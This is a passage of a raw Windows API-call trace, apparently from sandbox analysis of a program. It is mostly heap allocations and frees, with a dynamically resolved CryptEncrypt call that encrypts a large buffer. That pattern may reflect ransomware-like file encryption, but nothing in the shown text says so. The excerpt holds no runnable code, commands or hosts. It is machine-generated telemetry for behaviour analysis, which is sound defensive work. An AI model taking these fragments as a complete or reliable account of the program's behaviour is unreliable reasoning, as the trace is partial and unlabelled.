PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0212.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0212.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0212.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0212.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0212.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0212.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0212.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0212.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0212.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0212.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0212.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0212.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0212.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0212.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0212.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0212.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0212.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0212.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0212.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0212.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0212.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0212.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0212.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0212.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0212.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cc8 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0212.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0212.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0212.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0212.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0212.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0212.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0212.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0212.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0212.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9c99) returned 0x2e80330 [0212.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0212.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0212.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0212.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0212.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0212.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0212.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0212.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0212.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0212.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0212.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0212.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0212.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0212.216] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0212.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0212.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0212.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0212.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.216] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0212.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0212.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0212.217] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0212.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0212.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0212.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0212.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0212.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0212.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0212.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0212.217] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.217] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0212.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0212.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0212.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0212.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0212.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.218] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0212.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0212.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0212.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0212.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0212.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0212.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0212.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0212.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0212.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0212.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0212.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0212.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0212.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0212.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0212.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0212.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0212.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0212.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0212.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50c20 [0212.221] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.221] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0212.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0212.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e543a0 [0212.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0212.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0212.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0212.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0212.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0212.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0212.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0212.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0212.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0212.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0212.222] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f41610*, pdwDataLen=0x8cef60*=0x9c99, dwBufLen=0x9ca0 | out: pbData=0x2f41610*, pdwDataLen=0x8cef60*=0x9ca0) returned 1 [0212.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0212.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0212.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0212.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0212.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0212.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0212.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0212.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0212.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0212.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0212.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0212.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0212.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0212.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0212.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0212.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0212.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0212.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0212.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0212.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0212.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0212.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0212.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0212.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0212.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0212.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0212.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0212.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0212.226] RtlAllocateHeap 